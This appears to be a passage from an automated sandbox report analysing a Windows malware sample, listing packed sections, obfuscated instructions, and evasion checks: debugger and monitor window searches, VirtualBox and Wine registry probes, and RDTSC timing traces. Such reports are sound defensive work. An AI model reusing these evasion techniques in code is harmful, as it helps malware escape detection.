              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1c00db should be: 0x1c2717
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: olrcobvx
              Source: file.exeStatic PE information: section name: fyiwyewh
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_012BC12D push edx; mov dword ptr [esp], eax | 1_2_012BC173
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_01285932 push eax; mov dword ptr [esp], ecx | 1_2_01285950
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_012F2931 push esi; mov dword ptr [esp], 253723A2h | 1_2_012F295F
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0120911D push edx; mov dword ptr [esp], ebp | 1_2_01209149
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0120911D push ebp; mov dword ptr [esp], ebx | 1_2_0120914D
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0120911D push edi; mov dword ptr [esp], ebp | 1_2_012091CD
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0120911D push 34EFDCE6h; mov dword ptr [esp], esi | 1_2_0120923E
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0120911D push esi; mov dword ptr [esp], edx | 1_2_012092AF
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0120911D push eax; mov dword ptr [esp], edx | 1_2_012094D1
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0120911D push 29B57B30h; mov dword ptr [esp], ecx | 1_2_0120950B
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0120911D push 428040A8h; mov dword ptr [esp], ebx | 1_2_0120953D
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0120911D push 723646FFh; mov dword ptr [esp], ecx | 1_2_012095B0
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0120911D push ebx; mov dword ptr [esp], edi | 1_2_012095D2
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0120911D push ebp; mov dword ptr [esp], esi | 1_2_012095F6
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0120911D push eax; mov dword ptr [esp], ebp | 1_2_012096E9
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0120911D push edx; mov dword ptr [esp], 2F4CE6F6h | 1_2_012097CA
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0120911D push esi; mov dword ptr [esp], ebp | 1_2_012097D5
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0120911D push edi; mov dword ptr [esp], eax | 1_2_012097E3
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0120911D push edi; mov dword ptr [esp], edx | 1_2_01209800
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0120911D push edi; mov dword ptr [esp], ecx | 1_2_0120983C
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0120911D push esi; mov dword ptr [esp], edi | 1_2_012098FE
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0120911D push ebx; mov dword ptr [esp], esi | 1_2_012099E0
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0120911D push 11771006h; mov dword ptr [esp], ecx | 1_2_01209A54
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0120911D push eax; mov dword ptr [esp], edx | 1_2_01209AB9
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0120911D push ebp; mov dword ptr [esp], 7EF6B9A8h | 1_2_01209B40
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0120911D push 7D638436h; mov dword ptr [esp], edi | 1_2_01209C3C
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0120911D push esi; mov dword ptr [esp], eax | 1_2_01209C47
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0120911D push edi; mov dword ptr [esp], esi | 1_2_01209C67
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0120911D push 4A4D58E5h; mov dword ptr [esp], ebx | 1_2_01209C78
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0120911D push 75A0A2FCh; mov dword ptr [esp], ebx | 1_2_01209CA8
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0120911D push esi; mov dword ptr [esp], edx | 1_2_01209CD7
              Source: file.exe | Static PE information: section name: olrcobvx entropy: 7.953678479680492

              Boot Survival

              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E66390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 1_2_00E66390

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_1-26190
              Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
              Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124B9E1 second address: 124B9E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124D00B second address: 124D00F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124D00F second address: 124D015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1251E63 second address: 1251E69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1251E69 second address: 1251E7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jl 00007F67787C018Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1250FEB second address: 1250FEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124D883 second address: 124D889 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1251F90 second address: 1251F96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124D889 second address: 124D89C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jp 00007F67787C0198h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124D89C second address: 124D8A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1253F71 second address: 1253FB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 movsx edi, cx 0x00000009 push 00000000h 0x0000000b jmp 00007F67787C018Ah 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F67787C0188h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c mov ebx, dword ptr [ebp+122D2A05h] 0x00000032 xchg eax, esi 0x00000033 pushad 0x00000034 push esi 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1254FB9 second address: 1254FC7 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6778CEBE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1254FC7 second address: 1254FCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1254FCB second address: 1255008 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6778CEBE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e pushad 0x0000000f adc di, E252h 0x00000014 call 00007F6778CEBE4Bh 0x00000019 pushad 0x0000001a popad 0x0000001b pop ecx 0x0000001c popad 0x0000001d mov dword ptr [ebp+1246FFACh], esi 0x00000023 push 00000000h 0x00000025 mov di, ax 0x00000028 push 00000000h 0x0000002a sub dword ptr [ebp+122D3827h], edi 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1255008 second address: 125500C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125500C second address: 1255012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1256FF1 second address: 12570A8 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F67787C0186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edx 0x0000000f pop edx 0x00000010 jmp 00007F67787C0190h 0x00000015 popad 0x00000016 pop edx 0x00000017 nop 0x00000018 push 00000000h 0x0000001a push edx 0x0000001b call 00007F67787C0188h 0x00000020 pop edx 0x00000021 mov dword ptr [esp+04h], edx 0x00000025 add dword ptr [esp+04h], 0000001Bh 0x0000002d inc edx 0x0000002e push edx 0x0000002f ret 0x00000030 pop edx 0x00000031 ret 0x00000032 sub dword ptr [ebp+122D34F3h], esi 0x00000038 call 00007F67787C0193h 0x0000003d or bx, 9378h 0x00000042 pop ebx 0x00000043 push 00000000h 0x00000045 mov ebx, dword ptr [ebp+122D19AAh] 0x0000004b push 00000000h 0x0000004d push 00000000h 0x0000004f push edx 0x00000050 call 00007F67787C0188h 0x00000055 pop edx 0x00000056 mov dword ptr [esp+04h], edx 0x0000005a add dword ptr [esp+04h], 0000001Bh 0x00000062 inc edx 0x00000063 push edx 0x00000064 ret 0x00000065 pop edx 0x00000066 ret 0x00000067 js 00007F67787C0197h 0x0000006d jmp 00007F67787C0191h 0x00000072 xchg eax, esi 0x00000073 push eax 0x00000074 push edx 0x00000075 jmp 00007F67787C018Bh 0x0000007a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12570A8 second address: 12570AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12570AD second address: 12570B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1259154 second address: 1259158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120555C second address: 1205562 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1205562 second address: 1205581 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F6778CEBE46h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12596AE second address: 12596B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12596B2 second address: 12596B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1256251 second address: 1256257 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1256257 second address: 125625B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125B646 second address: 125B64C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125B64C second address: 125B650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12598BC second address: 12598C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125D963 second address: 125D9CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jmp 00007F6778CEBE4Eh 0x0000000f pop ecx 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 je 00007F6778CEBE48h 0x00000019 pushad 0x0000001a popad 0x0000001b pop eax 0x0000001c nop 0x0000001d push 00000000h 0x0000001f push eax 0x00000020 call 00007F6778CEBE48h 0x00000025 pop eax 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a add dword ptr [esp+04h], 00000018h 0x00000032 inc eax 0x00000033 push eax 0x00000034 ret 0x00000035 pop eax 0x00000036 ret 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b mov dword ptr [ebp+122D3182h], esi 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 push edx 0x00000045 pushad 0x00000046 popad 0x00000047 pop edx 0x00000048 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125E8B5 second address: 125E927 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67787C0194h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007F67787C0188h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 call 00007F67787C018Dh 0x0000002b mov di, 75CFh 0x0000002f pop edi 0x00000030 push 00000000h 0x00000032 jmp 00007F67787C0192h 0x00000037 push 00000000h 0x00000039 mov bl, F9h 0x0000003b xchg eax, esi 0x0000003c jo 00007F67787C018Eh 0x00000042 push esi 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125F8BB second address: 125F8BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125F8BF second address: 125F8D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 je 00007F67787C0198h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1261956 second address: 126195A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126195A second address: 126196B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126476D second address: 126477D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jno 00007F6778CEBE46h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12662F5 second address: 12662F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12662F9 second address: 126630B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F6778CEBE46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126630B second address: 126630F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126630F second address: 1266321 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 jnp 00007F6778CEBE56h 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1269791 second address: 12697AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67787C0195h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126C3E6 second address: 126C3F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push esi 0x00000007 pop esi 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126C3F5 second address: 126C3F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126C3F9 second address: 126C3FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126C3FD second address: 126C406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12701CB second address: 12701EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 jbe 00007F6778CEBE46h 0x0000000f pop edi 0x00000010 pop ecx 0x00000011 jp 00007F6778CEBE71h 0x00000017 push eax 0x00000018 push edx 0x00000019 jne 00007F6778CEBE46h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127563F second address: 127565C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F67787C018Fh 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127565C second address: 1275663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1279839 second address: 1279851 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F67787C0191h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127A2A0 second address: 127A2C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F6778CEBE48h 0x0000000e jnl 00007F6778CEBE56h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127A45D second address: 127A468 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127A468 second address: 127A478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F6778CEBE46h 0x0000000a pop ebx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127A478 second address: 127A482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127A482 second address: 127A48A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127A5D2 second address: 127A5E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007F67787C0192h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127A5E3 second address: 127A5E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127A5E9 second address: 127A5F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F67787C018Ch 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125B904 second address: 125B908 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125C9D3 second address: 125C9D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125B908 second address: 125B912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125DB44 second address: 125DB48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125C9D7 second address: 125C9DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125B912 second address: 125B916 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125C9DD second address: 125C9F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125DB48 second address: 125DBC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F67787C018Ch 0x0000000e popad 0x0000000f popad 0x00000010 nop 0x00000011 mov dword ptr [ebp+122D3199h], ebx 0x00000017 push dword ptr fs:[00000000h] 0x0000001e push 00000000h 0x00000020 push edi 0x00000021 call 00007F67787C0188h 0x00000026 pop edi 0x00000027 mov dword ptr [esp+04h], edi 0x0000002b add dword ptr [esp+04h], 00000014h 0x00000033 inc edi 0x00000034 push edi 0x00000035 ret 0x00000036 pop edi 0x00000037 ret 0x00000038 pushad 0x00000039 or dword ptr [ebp+1246D150h], eax 0x0000003f mov esi, dword ptr [ebp+122D1E22h] 0x00000045 popad 0x00000046 mov dword ptr fs:[00000000h], esp 0x0000004d xor dword ptr [ebp+122D27BAh], edx 0x00000053 mov ebx, 13F66866h 0x00000058 mov eax, dword ptr [ebp+122D0CD1h] 0x0000005e mov dword ptr [ebp+12458764h], edx 0x00000064 push FFFFFFFFh 0x00000066 or ebx, dword ptr [ebp+1247CB69h] 0x0000006c push eax 0x0000006d pushad 0x0000006e pushad 0x0000006f push eax 0x00000070 push edx 0x00000071 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125DBC2 second address: 125DBC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125DBC8 second address: 125DBD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1260A6E second address: 1260A74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
